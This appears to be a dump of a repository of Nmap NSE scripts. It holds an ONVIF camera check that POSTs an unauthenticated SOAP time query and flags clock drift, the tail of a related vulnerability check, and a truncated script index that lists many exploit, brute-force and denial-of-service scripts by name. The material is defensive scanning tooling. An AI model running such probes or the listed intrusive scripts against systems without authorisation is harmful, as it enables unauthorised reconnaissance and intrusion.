response.body 27 | 28 | if response.body and response.status == 200 and ( string.match( body, "</s:Envelope>" ) or string.match( body, "</env:Envelope>" ) ) then 29 | output_tab.display = "Found vulnerable." 30 | else 31 | output_tab.display = "Not vulnerable." 32 | end 33 | 34 | return output_tab 35 | end 36 | -------------------------------------------------------------------------------- /onvif/onvif_post_timecomparion.nse: -------------------------------------------------------------------------------- 1 | local http = require "http" 2 | local shortport = require "shortport" 3 | local stdnse = require "stdnse" 4 | local string = require "string" 5 | local table = require "table" 6 | local vulns = require "vulns" 7 | local datetime = require "datetime" 8 | 9 | 10 | description = [[ 11 | 视频设备时间戳与系统时间偏差5分钟以上,会导致视频录像时间较大偏差。 12 | ]] 13 | 14 | 15 | author = "seaung" 16 | 17 | license = "Same as Nmap--See https://nmap.org/book/man-legal.html" 18 | 19 | categories = {"vuln_detect", "onvif_post_timecomparion"} 20 | 21 | 22 | portrule = shortport.port_or_service( {80, 443}, {"http", "https"}, "tcp", "open") 23 | 24 | 25 | action = function(host, port) 26 | local sys_time = os.time() 27 | 28 | local output_tab = stdnse.output_table() 29 | local path = "/onvif/device_service" 30 | local exploit = [[<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope"><s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><GetSystemDateAndTime xmlns="http://www.onvif.org/ver10/device/wsdl"/></s:Body></s:Envelope>]] 31 | local options = {header={["Content-Type"]='application/soap+xml; charset=utf-8; action="http://www.onvif.org/ver10/device/wsdl/GetSystemDateAndTime"'}} 32 | local response = http.post(host, port, path, options, nil, exploit) 33 | 34 | local rawheader = response.rawheader 35 | local body = response.body 36 | local match_year = "<tt:Year>([^<]*)</tt:Year>" 37 | local match_month = "<tt:Month>([^<]*)</tt:Month>" 38 | local match_day = "<tt:Day>([^<]*)</tt:Day>" 39 | local match_hour = "<tt:LocalDateTime><tt:Time><tt:Hour>([^<]*)</tt:Hour>" 40 | local match_minute = "<tt:Minute>([^<]*)</tt:Minute>" 41 | local match_second = "<tt:Second>([^<]*)</tt:Second>" 42 | 43 | local ipc_date_year 44 | local ipc_date_month 45 | local ipc_date_day 46 | local ipc_date_hour 47 | local ipc_date_minute 48 | local ipc_date_second 49 | 50 | if body then 51 | ipc_date_year = string.match(body, match_year) 52 | ipc_date_month = string.match(body, match_month) 53 | ipc_date_day = string.match(body, match_day) 54 | ipc_date_hour = string.match(body, match_hour) 55 | ipc_date_minute = string.match(body, match_minute) 56 | ipc_date_second = string.match(body, match_second) 57 | end 58 | 59 | if not ( ipc_date_year or ipc_date_month or ipc_date_day or ipc_date_hour or ipc_date_minute or ipc_date_second ) then 60 | output_tab.yd_ipc_date_s = 'get date err' 61 | else 62 | local ipc_date = os.time({year=ipc_date_year,month=ipc_date_month,day=ipc_date_day,hour=ipc_date_hour,min=ipc_date_minute,sec=ipc_date_second}) 63 | local diff_time = os.difftime(ipc_date, sys_time) 64 | diff_time = math.abs(diff_time) 65 | 66 | if diff_time >= 60*5 then 67 | diff_time_s = 'diff_time greater than 5 minute' 68 | else 69 | diff_time_s = 'diff_time less than 5 minute' 70 | end 71 | 72 | if response.status == 200 or response.status == 401 then 73 | output_tab.yd_sys_time_s = sys_time 74 | output_tab.yd_ipc_date_s = ipc_date 75 | output_tab.yd_diff_time = diff_time 76 | output_tab.yd_diff_time_s = diff_time_s 77 | end 78 | end 79 | 80 | return output_tab 81 | 82 | end 83 | -------------------------------------------------------------------------------- /script.db: -------------------------------------------------------------------------------- 1 | Entry { filename = "acarsd-info.nse", categories = { "discovery", "safe", } } 2 | Entry { filename = "address-info.nse", categories = { "default", "safe", } } 3 | Entry { filename = "afp-brute.nse", categories = { "brute", "intrusive", } } 4 | Entry { filename = "afp-ls.nse", categories = { "discovery", "safe", } } 5 | Entry { filename = "afp-path-vuln.nse", categories = { "exploit", "intrusive", "vuln", } } 6 | Entry { filename = "afp-serverinfo.nse", categories = { "default", "discovery", "safe", } } 7 | Entry { filename = "afp-showmount.nse", categories = { "discovery", "safe", } } 8 | Entry { filename = "ajp-auth.nse", categories = { "auth", "default", "safe", } } 9 | Entry { filename = "ajp-brute.nse", categories = { "brute", "intrusive", } } 10 | Entry { filename = "ajp-headers.nse", categories = { "discovery", "safe", } } 11 | Entry { filename = "ajp-methods.nse", categories = { "default", "safe", } } 12 | Entry { filename = "ajp-request.nse", categories = { "discovery", "safe", } } 13 | Entry { filename = "allseeingeye-info.nse", categories = { "discovery", "safe", "version", } } 14 | Entry { filename = "amqp-info.nse", categories = { "default", "discovery", "safe", "version", } } 15 | Entry { filename = "asn-query.nse", categories = { "discovery", "external", "safe", } } 16 | Entry { filename = "auth-owners.nse", categories = { "default", "safe", } } 17 | Entry { filename = "auth-spoof.nse", categories = { "malware", "safe", } } 18 | Entry { filename = "backorifice-brute.nse", categories = { "brute", "intrusive", } } 19 | Entry { filename = "backorifice-info.nse", categories = { "default", "discovery", "safe", } } 20 | Entry { filename = "bacnet-info.nse", categories = { "discovery", "version", } } 21 | Entry { filename = "banner.nse", categories = { "discovery", "safe", } } 22 | Entry { filename = "bitcoin-getaddr.nse", categories = { "discovery", "safe", } } 23 | Entry { filename = "bitcoin-info.nse", categories = { "discovery", "safe", } } 24 | Entry { filename = "bitcoinrpc-info.nse", categories = { "default", "discovery", "safe", } } 25 | Entry { filename = "bittorrent-discovery.nse", categories = { "discovery", "safe", } } 26 | Entry { filename = "bjnp-discover.nse", categories = { "discovery", "safe", } } 27 | Entry { filename = "broadcast-ataoe-discover.nse", categories = { "broadcast", "safe", } } 28 | Entry { filename = "broadcast-avahi-dos.nse", categories = { "broadcast", "dos", "intrusive", "vuln", } } 29 | Entry { filename = "broadcast-bjnp-discover.nse", categories = { "broadcast", "safe", } } 30 | Entry { filename = "broadcast-db2-discover.nse", categories = { "broadcast", "safe", } } 31 | Entry { filename = "broadcast-dhcp-discover.nse", categories = { "broadcast", "safe", } } 32 | Entry { filename = "broadcast-dhcp6-discover.nse", categories = { "broadcast", "safe", } } 33 | Entry { filename = "broadcast-dns-service-discovery.nse", categories = { "broadcast", "safe", } } 34 | Entry { filename = "broadcast-dropbox-listener.nse", categories = { "broadcast", "safe", } } 35 | Entry { filename = "broadcast-eigrp-discovery.nse", categories = { "broadcast", "discovery", "safe", } } 36 | Entry { filename = "broadcast-hid-discoveryd.nse", categories = { "broadcast", "discovery", "safe", } } 37 | Entry { filename = "broadcast-igmp-discovery.nse", categories = { "broadcast", "discovery", "safe", } } 38 | Entry { filename = "broadcast-jenkins-discover.nse", categories = { "broadcast", "discovery", "safe", } } 39 | Entry { filename = "broadcast-listener.nse", categories = { "broadcast", "safe", } } 40 | Entry { filename = "broadcast-ms-sql-discover.nse", categories = { "broadcast", "safe", } } 41 | Entry { filename = "broadcast-netbios-master-browser.nse", categories = { "broadcast", "safe", } } 42 | Entry { filename = "broadcast-networker-discover.nse", categories = { "broadcast", "safe", } } 43 | Entry { filename = "broadcast-novell-locate.nse", categories = { "broadcast", "safe", } } 44 | Entry { filename = "broadcast-ospf2-discover.nse", categories = { "broadcast", "discovery", "safe", } } 45 | Entry { filename = "broadcast-pc-anywhere.nse", categories = { "broadcast", "safe", } } 46 | Entry { filename = "broadcast-pc-duo.nse", categories = { "broadcast", "safe", } } 47 | Entry { filename = "broadcast-pim-discovery.nse", categories = { "broadcast", "discovery", "safe", } } 48 | Entry { filename = "broadcast-ping.nse", categories = { "broadcast", "discovery", "safe", } } 49 | Entry { filename = "broadcast-pppoe-discover.nse", categories = { "broadcast", "safe", } } 50 | Entry { filename = "broadcast-rip-discover.nse", categories = { "broadcast", "safe", } } 51 | Entry { filename = "broadcast-ripng-discover.nse", categories = { "broadcast", "safe", } } 52 | Entry { filename = "broadcast-sonicwall-discover.nse", categories = { "broadcast", "safe", } } 53 | Entry { filename = "broadcast-sybase-asa-discover.nse", categories = { "broadcast", "safe", } } 54 | Entry { filename = "broadcast-tellstick-discover.nse", categories = { "broadcast", "safe", } } 55 | Entry { filename = "broadcast-upnp-info.nse", categories = { "broadcast", "safe", } } 56 | Entry { filename = "broadcast-versant-locate.nse", categories = { "broadcast", "safe", } } 57 | Entry { filename = "broadcast-wake-on-lan.nse", categories = { "broadcast", "safe", } } 58 | Entry { filename = "broadcast-wpad-discover.nse", categories = { "broadcast", "safe", } } 59 | Entry { filename = "broadcast-wsdd-discover.nse", categories = { "broadcast", "safe", } } 60 | Entry { filename = "broadcast-xdmcp-discover.nse", categories = { "broadcast", "safe", } } 61 | Entry { filename = "cassandra-brute.nse", categories = { "brute", "intrusive", } } 62 | Entry { filename = "cassandra-info.nse", categories = { "default", "discovery", "safe", } } 63 | Entry { filename = "cccam-version.nse", categories = { "version", } } 64 | Entry { filename = "cics-enum.nse", categories = { "brute", "intrusive", } } 65 | Entry { filename = "cics-info.nse", categories = { "discovery", "safe", } } 66 | Entry { filename = "cics-user-brute.nse", categories = { "brute", "intrusive", } } 67 | Entry { filename = "cics-user-enum.nse", categories = { "brute", "intrusive", } } 68 | Entry { filename = "citrix-brute-xml.nse", categories = { "brute", "intrusive", } } 69 | Entry { filename = "citrix-enum-apps-xml.nse", categories = { "discovery", "safe", } } 70 | Entry { filename = "citrix-enum-apps.nse", categories = { "discovery", "safe", } } 71 | Entry { filename = "citrix-enum-servers-xml.nse", categories = { "discovery", "safe", } } 72 | Entry { filename = "citrix-enum-servers.nse", categories = { "discovery", "safe", } } 73 | Entry { filename = "clamav-exec.nse", categories = { "exploit", "vuln", } } 74 | Entry { filename = "clock-skew.nse", categories = { "default", "safe", } } 75 | Entry { filename = "coap-resources.nse", categories = { "discovery", "safe", } } 76 | Entry { filename = "couchdb-databases.nse", categories = { "discovery", "safe", } } 77 | Entry { filename = "couchdb-stats.nse", categories = { "discovery", "safe", } } 78 | Entry { filename = "creds-summary.nse", categories = { "auth", "default", "safe", } } 79 | Entry { filename = "cups-info.nse", categories = { "discovery", "safe", } } 80 | Entry { filename = "cups-queue-info.nse", categories = { "discovery", "safe", } } 81 | Entry { filename = "cvs-brute-repository.nse", categories = { "brute", "intrusive", } } 82 | Entry { filename = "cvs-brute.nse", categories = { "brute", "intrusive", } } 83 | Entry { filename = "daap-get-library.nse", categories = { "discovery", "safe", } } 84 | Entry { filename = "daytime.nse", categories = { "discovery", "safe", } } 85 | Entry { filename = "db2-das-info.nse", categories = { "discovery", "safe", "version", } } 86 | Entry { filename = "deluge-rpc-brute.nse", categories = { "brute", "intrusive", } } 87 | Entry { filename = "dhcp-discover.nse", categories = { "discovery", "safe", } } 88 | Entry { filename = "dicom-brute.nse", categories = { "auth", "brute", } } 89 | Entry { filename = "dicom-ping.nse", categories = { "auth", "default", "discovery", "safe", } } 90 | Entry { filename = "dict-info.nse", categories = { "discovery", "safe", } } 91 | Entry { filename = "distcc-cve2004-2687.nse", categories = { "exploit", "intrusive", "vuln", } } 92 | Entry { filename = "dns-blacklist.nse", categories = { "external", "safe", } } 93 | Entry { filename = "dns-brute.nse", categories = { "discovery", "intrusive", } } 94 | Entry { filename = "dns-cache-snoop.nse", categories = { "discovery", "intrusive", } } 95 | Entry { filename = "dns-check-zone.nse", categories = { "discovery", "external", "safe", } } 96 | Entry { filename = "dns-client-subnet-scan.nse", categories = { "discovery", "safe", } } 97 | Entry { filename = "dns-fuzz.nse", categories = { "fuzzer", "intrusive", } } 98 | Entry { filename = "dns-ip6-arpa-scan.nse", categories = { "discovery", "intrusive", } } 99 | Entry { filename = "dns-nsec-enum.nse", categories = { "discovery", "intrusive", } } 100 | Entry { filename = "dns-nsec3-enum.nse", categories = { "discovery", "intrusive", } } 101 | Entry { filename = "dns-nsid.nse", categories = { "default", "discovery", "safe", } } 102 | Entry { filename = "dns-random-srcport.nse", categories = { "external", "intrusive", } } 103 | Entry { filename = "dns-random-txid.nse", categories = { "external", "intrusive", } } 104 | Entry { filename = "dns-recursion.nse", categories = { "default", "safe", } } 105 | Entry { filename = "dns-service-discovery.nse", categories = { "default", "discovery", "safe", } } 106 | Entry { filename = "dns-srv-enum.nse", categories = { "discovery", "safe", } } 107 | Entry { filename = "dns-update.nse", categories = { "intrusive", "vuln", } } 108 | Entry { filename = "dns-zeustracker.nse", categories = { "discovery", "external", "malware", "safe", } } 109 | Entry { filename = "dns-zone-transfer.nse", categories = { "discovery", "intrusive", } } 110 | Entry { filename = "docker-version.nse", categories = { "version", } } 111 | Entry { filename = "domcon-brute.nse", categories = { "brute", "intrusive", } } 112 | Entry { filename = "domcon-cmd.nse", categories = { "auth", "intrusive", } } 113 | Entry { filename = "domino-enum-users.nse", categories = { "auth", "intrusive", } } 114 | Entry { filename = "dpap-brute.nse", categories = { "brute", "intrusive", } } 115 | Entry { filename = "drda-brute.nse", categories = { "brute", "intrusive", } } 116 | Entry { filename = "drda-info.nse", categories = { "discovery", "safe", "version", } } 117 | Entry { filename = "duplicates.nse", categories = { "safe", } } 118 | Entry { filename = "eap-info.nse", categories = { "broadcast", "safe", } } 119 | Entry { filename = "enip-info.nse", categories = { "discovery", "version", } } 120 | Entry { filename = "epmd-info.nse", categories = { "default", "discovery", "safe", } } 121 | Entry { filename = "eppc-enum-processes.nse", categories = { "discovery", "safe", } } 122 | Entry { filename = "fcrdns.nse", categories = { "discovery", "safe", } } 123 | Entry { filename = "finger.nse", categories = { "default", "discovery", "safe", } } 124 | Entry { filename = "fingerprint-strings.nse", categories = { "version", } } 125 | Entry { filename = "firewalk.nse", categories = { "discovery", "safe", } } 126 | Entry { filename = "firewall-bypass.nse", categories = { "intrusive", "vuln", } } 127 | Entry { filename = "flume-master-info.nse", categories = { "default", "discovery", "safe", } } 128 | Entry { filename = "fox-info.nse", categories = { "discovery", "version", } } 129 | Entry { filename = "freelancer-info.nse", categories = { "default", "discovery", "safe", "version", } } 130 | Entry { filename = "ftp-anon.nse", categories = { "auth", "default", "safe", } } 131 | Entry { filename = "ftp-bounce.nse", categories = { "default", "safe", } } 132 | Entry { filename = "ftp-brute.nse", categories = { "brute", "intrusive", } } 133 | Entry { filename = "ftp-libopie.nse", categories = { "intrusive", "vuln", } } 134 | Entry { filename = "ftp-proftpd-backdoor.nse", categories = { "exploit", "intrusive", "malware", "vuln", } } 135 | Entry { filename = "ftp-syst.nse", categories = { "default", "discovery", "safe", } } 136 | Entry { filename = "ftp-vsftpd-backdoor.nse", categories = { "exploit", "intrusive", "malware", "vuln", } } 137 | Entry { filename = "ftp-vuln-cve2010-4221.nse", categories = { "intrusive", "vuln", } } 138 | Entry { filename = "ganglia-info.nse", categories = { "default", "discovery", "safe", } } 139 | Entry { filename = "giop-info.nse", categories = { "default", "discovery", "safe", } } 140 | Entry { filename = "gkrellm-info.nse", categories = { "discovery", "safe", } } 141 | Entry { filename = "gopher-ls.nse", categories = { "default", "discovery", "safe", } } 142 | Entry { filename = "gpsd-info.nse", categories = { "discovery", "safe", } } 143 | Entry { filename = "hadoop-datanode-info.nse", categories = { "default", "discovery", "safe", } } 144 | Entry { filename = "hadoop-jobtracker-info.nse", categories = { "default", "discovery", "safe", } } 145 | Entry { filename = "hadoop-namenode-info.nse", categories = { "default", "discovery", "safe", } } 146 | Entry { filename = "hadoop-secondary-namenode-info.nse", categories = { "default", "discovery", "safe", } } 147 | Entry { filename = "hadoop-tasktracker-info.nse", categories = { "default", "discovery", "safe", } } 148 | Entry { filename = "hbase-master-info.nse", categories = { "default", "discovery", "safe", } } 149 | Entry { filename = "hbase-region-info.nse", categories = { "default", "discovery", "safe", } } 150 | Entry { filename = "hddtemp-info.nse", categories = { "default", "discovery", "safe", } } 151 | Entry { filename = "hnap-info.nse", categories = { "default", "discovery", "safe", "version", } } 152 | Entry { filename = "hostmap-bfk.nse", categories = { "discovery", "external", } } 153 | Entry { filename = "hostmap-crtsh.nse", categories = { "discovery", "external", } } 154 | Entry { filename = "hostmap-robtex.nse", categories = { "discovery", "external", "safe", } } 155 | Entry { filename = "http-adobe-coldfusion-apsa1301.nse", categories = { "exploit", "vuln", } } 156 | Entry { filename = "http-affiliate-id.nse", categories = { "discovery", "safe", } } 157 | Entry { filename = "http-apache-negotiation.nse", categories = { "discovery", "safe", } } 158 | Entry { filename = "http-apache-server-status.nse", categories = { "discovery", "safe", } } 159 | Entry { filename = "http-aspnet-debug.nse", categories = { "discovery", "vuln", } } 160 | Entry { filename = "http-auth-finder.nse", categories = { "discovery", "safe", } } 161 | Entry { filename = "http-auth.nse", categories = { "auth", "default", "safe", } } 162 | Entry { filename = "http-avaya-ipoffice-users.nse", categories = { "exploit", "vuln", } } 163 | Entry { filename = "http-awstatstotals-exec.nse", categories = { "exploit", "intrusive", "vuln", } } 164 | Entry { filename = "http-axis2-dir-traversal.nse", categories = { "exploit", "intrusive", "vuln", } } 165 | Entry { filename = "http-backup-finder.nse", categories = { "discovery", "safe", } } 166 | Entry { filename = "http-barracuda-dir-traversal.nse", categories = { "auth", "exploit", "intrusive", } } 167 | Entry { filename = "http-bigip-cookie.nse", categories = { "discovery", "safe", } } 168 | Entry { filename = "http-brute.nse", categories = { "brute", "intrusive", } } 169 | Entry { filename = "http-cakephp-version.nse", categories = { "discovery", "safe", } } 170 | Entry { filename = "http-chrono.nse", categories = { "discovery", "intrusive", } } 171 | Entry { filename = "http-cisco-anyconnect.nse", categories = { "default", "discovery", "safe", } } 172 | Entry { filename = "http-coldfusion-subzero.nse", categories = { "exploit", } } 173 | Entry { filename = "http-comments-displayer.nse", categories = { "discovery", "safe", } } 174 | Entry { filename = "http-config-backup.nse", categories = { "auth", "intrusive", } } 175 | Entry { filename = "http-cookie-flags.nse", categories = { "default", "safe", "vuln", } } 176 | Entry { filename = "http-cors.nse", categories = { "default", "discovery", "safe", } } 177 | Entry { filename = "http-cross-domain-policy.nse", categories = { "external", "safe", "vuln", } } 178 | Entry { filename = "http-csrf.nse", categories = { "exploit", "intrusive", "vuln", } } 179 | Entry { filename = "http-date.nse", categories = { "discovery", "safe", } } 180 | Entry { filename = "http-default-accounts.nse", categories = { "auth", "discovery", "intrusive", } } 181 | Entry { filename = "http-devframework.nse", categories = { "discovery", "intrusive", } } 182 | Entry { filename = "http-dlink-backdoor.nse", categories = { "exploit", "vuln", } } 183 | Entry { filename = "http-dombased-xss.nse", categories = { "exploit", "intrusive", "vuln", } } 184 | Entry { filename = "http-domino-enum-passwords.nse", categories = { "auth", "intrusive", } } 185 | Entry { filename = "http-drupal-enum-users.nse", categories = { "discovery", "intrusive", } } 186 | Entry { filename = "http-drupal-enum.nse", categories = { "discovery", "intrusive", } } 187 | Entry { filename = "http-enum.nse", categories = { "discovery", "intrusive", "vuln", } } 188 | Entry { filename = "http-errors.nse", categories = { "discovery", "intrusive", } } 189 | Entry { filename = "http-exif-spider.nse", categories = { "intrusive", } } 190 | Entry { filename = "http-favicon.nse", categories = { "default", "discovery", "safe", } } 191 | Entry { filename = "http-feed.nse", categories = { "discovery", "intrusive", } } 192 | Entry { filename = "http-fetch.nse", categories = { "safe", } } 193 | Entry { filename = "http-fileupload-exploiter.nse", categories = { "exploit", "intrusive", "vuln", } } 194 | Entry { filename = "http-form-brute.nse", categories = { "brute", "intrusive", } } 195 | Entry { filename = "http-form-fuzzer.nse", categories = { "fuzzer", "intrusive", } } 196 | Entry { filename = "http-frontpage-login.nse", categories = { "safe", "vuln", } } 197 | Entry { filename = "http-generator.nse", categories = { "default", "discovery", "safe", } } 198 | Entry { filename = "http-git.nse", categories = { "default", "safe", "vuln", } } 199 | Entry { filename = "http-gitweb-projects-enum.nse", categories = { "discovery", "safe", } } 200 | Entry { filename = "http-google-malware.nse", categories = { "discovery", "external", "malware", "safe", } } 201 | Entry { filename = "http-grep.nse", categories = { "discovery", "safe", } } 202 | Entry { filename = "http-headers.nse", categories = { "discovery", "safe", } } 203 | Entry { filename = "http-hp-ilo-info.nse", categories = { "discovery", "safe", } } 204 | Entry { filename = "http-huawei-hg5xx-vuln.nse", categories = { "exploit", "vuln", } } 205 | Entry { filename = "http-icloud-findmyiphone.nse", categories = { "discovery", "external", "safe", } } 206 | Entry { filename = "http-icloud-sendmsg.nse", categories = { "discovery", "external", "safe", } } 207 | Entry { filename = "http-iis-short-name-brute.nse", categories = { "brute", "intrusive", } } 208 | Entry { filename = "http-iis-webdav-vuln.nse", categories = { "intrusive", "vuln", } } 209 | Entry { filename = "http-internal-ip-disclosure.nse", categories = { "discovery", "safe", "vuln", } } 210 | Entry { filename = "http-joomla-brute.nse", categories = { "brute", "intrusive", } } 211 | Entry { filename = "http-jsonp-detection.nse", categories = { "discovery", "safe", "vuln", } } 212 | Entry { filename = "http-litespeed-sourcecode-download.nse", categories = { "exploit", "intrusive", "vuln", } } 213 | Entry { filename = "http-ls.nse", categories = { "default", "discovery", "safe", } } 214 | Entry { filename = "http-majordomo2-dir-traversal.nse", categories = { "exploit", "intrusive", "vuln", } } 215 | Entry { filename = "http-malware-host.nse", categories = { "malware", "safe", } } 216 | Entry { filename = "http-mcmp.nse", categories = { "discovery", "safe", } } 217 | Entry { filename = "http-method-tamper.nse", categories = { "auth", "vuln", } } 218 | Entry { filename = "http-methods.nse", categories = { "default", "safe", } } 219 | Entry { filename = "http-mobileversion-checker.nse", categories = { "discovery", "safe", } } 220 | Entry { filename = "http-ntlm-info.nse", categories = { "default", "discovery", "safe", } } 221 | Entry { filename = "http-open-proxy.nse", categories = { "default", "discovery", "external", "safe", } } 222 | Entry { filename = "http-open-redirect.nse", categories = { "discovery", "intrusive", } } 223 | Entry { filename = "http-passwd.nse", categories = { "intrusive", "vuln", } } 224 | Entry { filename = "http-php-version.nse", categories = { "discovery", "safe", } } 225 | Entry { filename = "http-phpmyadmin-dir-traversal.nse", categories = { "exploit", "vuln", } } 226 | Entry { filename = "http-phpself-xss.nse", categories = { "fuzzer", "intrusive", "vuln", } } 227 | Entry { filename = "http-proxy-brute.nse", categories = { "brute", "external", "intrusive", } } 228 | Entry { filename = "http-put.nse", categories = { "discovery", "intrusive", } } 229 | Entry { filename = "http-qnap-nas-info.nse", categories = { "discovery", "safe", } } 230 | Entry { filename = "http-referer-checker.nse", categories = { "discovery", "safe", } } 231 | Entry { filename = "http-rfi-spider.nse", categories = { "intrusive", } } 232 | Entry { filename = "http-robots.txt.nse", categories = { "default", "discovery", "safe", } } 233 | Entry { filename = "http-robtex-reverse-ip.nse", categories = { "discovery", "external", "safe", } } 234 | Entry { filename = "http-robtex-shared-ns.nse", categories = { "discovery", "external", "safe", } } 235 | Entry { filename = "http-sap-netweaver-leak.nse", categories = { "discovery", "safe", } } 236 | Entry { filename = "http-security-headers.nse", categories = { "discovery", "safe", } } 237 | Entry { filename = "http-server-header.nse", categories = { "version", } } 238 | Entry { filename = "http-shellshock.nse", categories = { "exploit", "intrusive", "vuln", } } 239 | Entry { filename = "http-sitemap-generator.nse", categories = { "discovery", "intrusive", } } 240 | Entry { filename = "http-slowloris-check.nse", categories = { "safe", "vuln", } } 241 | Entry { filename = "http-slowloris.nse", categories = { "dos", "intrusive", } } 242 | Entry { filename = "http-sql-injection.nse", categories = { "intrusive", "vuln", } } 243 | Entry { filename = "http-stored-xss.nse", categories = { "exploit", "intrusive", "vuln", } } 244 | Entry { filename = "http-svn-enum.nse", categories = { "default", "discovery", "safe", } } 245 | Entry { filename = "http-svn-info.nse", categories = { "default", "discovery", "safe", } } 246 | Entry { filename = "http-title.nse", categories = { "default", "discovery", "safe", } } 247 | Entry { filename = "http-tplink-dir-traversal.nse", categories = { "exploit", "vuln", } } 248 | Entry { filename = "http-trace.nse", categories = { "discovery", "safe", "vuln", } } 249 | Entry { filename = "http-traceroute.nse", categories = { "discovery", "safe", } } 250 | Entry { filename = "http-trane-info.nse", categories = { "discovery", "safe", "version", } } 251 | Entry { filename = "http-unsafe-output-escaping.nse", categories = { "discovery", "intrusive", } } 252 | Entry { filename = "http-useragent-tester.nse", categories = { "discovery", "safe", } } 253 | Entry { filename = "http-userdir-enum.nse", categories = { "auth", "intrusive", } } 254 | Entry { filename = "http-vhosts.nse", categories = { "discovery", "intrusive", } } 255 | Entry { filename = "http-virustotal.nse", categories = { "external", "malware", "safe", } } 256 | Entry { filename = "http-vlcstreamer-ls.nse", categories = { "discovery", "safe", } } 257 | Entry { filename = "http-vmware-path-vuln.nse", categories = { "safe", "vuln", } } 258 | Entry { filename = "http-vuln-cve2006-3392.nse", categories = { "exploit", "intrusive", "vuln", } } 259 | Entry { filename = "http-vuln-cve2009-3960.nse", categories = { "exploit", "intrusive", "vuln", } } 260 | Entry { filename = "http-vuln-cve2010-0738.nse", categories = { "auth", "safe", "vuln", } } 261 | Entry { filename = "http-vuln-cve2010-2861.nse", categories = { "intrusive", "vuln", } } 262 | Entry { filename = "http-vuln-cve2011-3192.nse", categories = { "safe", "vuln", } } 263 | Entry { filename = "http-vuln-cve2011-3368.nse", categories = { "intrusive", "vuln", } } 264 | Entry { filename = "http-vuln-cve2012-1823.nse", categories = { "exploit", "intrusive", "vuln", } } 265 | Entry { filename = "http-vuln-cve2013-0156.nse", categories = { "exploit", "vuln", } } 266 | Entry { filename = "http-vuln-cve2013-6786.nse", categories = { "exploit", "vuln", } } 267 | Entry { filename = "http-vuln-cve2013-7091.nse", categories = { "exploit", "intrusive", "vuln", } } 268 | Entry { filename = "http-vuln-cve2014-2126.nse", categories = { "safe", "vuln", } } 269 | Entry { filename = "http-vuln-cve2014-2127.nse", categories = { "safe", "vuln", } } 270 | Entry { filename = "http-vuln-cve2014-2128.nse", categories = { "safe", "vuln", } } 271 | Entry { filename = "http-vuln-cve2014-2129.nse", categories = { "safe", "vuln", } } 272 | Entry { filename = "http-vuln-cve2014-3704.nse", categories = { "exploit", "intrusive", "vuln", } } 273 | Entry { filename = "http-vuln-cve2014-8877.nse", categories = { "exploit", "intrusive", "vuln", } } 274 | Entry { filename = "http-vuln-cve2015-1427.nse", categories = { "intrusive", "vuln", } } 275 | Entry { filename = "http-vuln-cve2015-1635.nse", categories = { "safe", "vuln", } } 276 | Entry { filename = "http-vuln-cve2017-1001000.nse", categories = { "safe", "vuln", } } 277 | Entry { filename = "http-vuln-cve2017-5638.nse", categories = { "vuln", } } 278 | Entry { filename = "http-vuln-cve2017-5689.nse", categories = { "auth", "exploit", "vuln", } } 279 | Entry { filename = "http-vuln-cve2017-8917.nse", categories = { "intrusive", "vuln", } } 280 | Entry { filename = "http-vuln-misfortune-cookie.nse", categories = { "intrusive", "vuln", } } 281 | Entry { filename = "http-vuln-wnr1000-creds.nse", categories = { "exploit", "intrusive", "vuln", } } 282 | Entry { filename = "http-waf-detect.nse", categories = { "discovery", "intrusive", } } 283 | Entry { filename = "http-waf-fingerprint.nse", categories = { "discovery", "intrusive", } } 284 | Entry { filename = "http-webdav-scan.nse", categories = { "default", "discovery", "safe", } } 285 | Entry { filename = "http-wordpress-brute.nse", categories = { "brute", "intrusive", } } 286 | Entry { filename = "http-wordpress-enum.nse", categories = { "discovery", "intrusive", } } 287 | Entry { filename = "http-wordpress-users.nse", categories = { "auth", "intrusive", "vuln", } } 288 | Entry { filename = "http-xssed.nse", categories = { "discovery", "external", "safe", } } 289 | Entry { filename = "https-redirect.nse", categories = { "version", } } 290 | Entry { filename = "iax2-brute.nse", categories = { "brute", "intrusive", } } 291 | Entry { filename = "iax2-version.nse", categories = { "version", } } 292 | Entry { filename = "icap-info.nse", categories = { "discovery", "safe", } } 293 | Entry { filename = "iec-identify.nse", categories = { "discovery", "intrusive", } } 294 | Entry { filename = "ike-version.nse", categories = { "default", "discovery", "safe", "version", } } 295 | Entry { filename = "imap-brute.nse", categories = { "brute", "intrusive", } } 296 | Entry { filename = "imap-capabilities.nse", categories = { "default", "safe", } } 297 | Entry { filename = "imap-ntlm-info.nse", categories = { "default", "discovery", "safe", } } 298 | Entry { filename = "impress-remote-discover.nse", categories = { "brute", "intrusive", } } 299 | Entry { filename = "informix-brute.nse", categories = { "brute", "intrusive", } } 300 | Entry { filename = "informix-query.nse", categories = { "auth", "intrusive", } } 301 | Entry { filename = "informix-tables.nse", categories = { "auth", "intrusive", } } 302 | Entry { filename = "ip-forwarding.nse", categories = { "discovery", "safe", } } 303 | Entry { filename = "ip-geolocation-geoplugin.nse", categories = { "discovery", "external", "safe", } } 304 | Entry { filename = "ip-geolocation-ipinfodb.nse", categories = { "discovery", "external", "safe", } } 305 | Entry { filename = "ip-geolocation-map-bing.nse", categories = { "external", "safe", } } 306 | Entry { filename = "ip-geolocation-map-google.nse", categories = { "external", "safe", } } 307 | Entry { filename = "ip-geolocation-map-kml.nse", categories = { "safe", } } 308 | Entry { filename = "ip-geolocation-maxmind.nse", categories = { "discovery", "external", "safe", } } 309 | Entry { filename = "ip-https-discover.nse", categories = { "default", "discovery", "safe", } } 310 | Entry { filename = "ipidseq.nse", categories = { "discovery", "safe", } } 311 | Entry { filename = "ipmi-brute.nse", categories = { "brute", "intrusive", } } 312 | Entry { filename = "ipmi-cipher-zero.nse", categories = { "safe", "vuln", } } 313 | Entry { filename = "ipmi-version.nse", categories = { "discovery", "safe", } } 314 | Entry { filename = "ipv6-multicast-mld-list.nse", categories = { "broadcast", "discovery", } } 315 | Entry { filename = "ipv6-node-info.nse", categories = { "default", "discovery", "safe", } } 316 | Entry { filename = "ipv6-ra-flood.nse", categories = { "dos", "intrusive", } } 317 | Entry { filename = "irc-botnet-channels.nse", categories = { "discovery", "safe", "vuln", } } 318 | Entry { filename = "irc-brute.nse", categories = { "brute", "intrusive", } } 319 | Entry { filename = "irc-info.nse", categories = { "default", "discovery", "safe", } } 320 | Entry { filename = "irc-sasl-brute.nse", categories = { "brute", "intrusive", } } 321 | Entry { filename = "irc-unrealircd-backdoor.nse", categories = { "exploit", "intrusive", "malware", "vuln", } } 322 | Entry { filename = 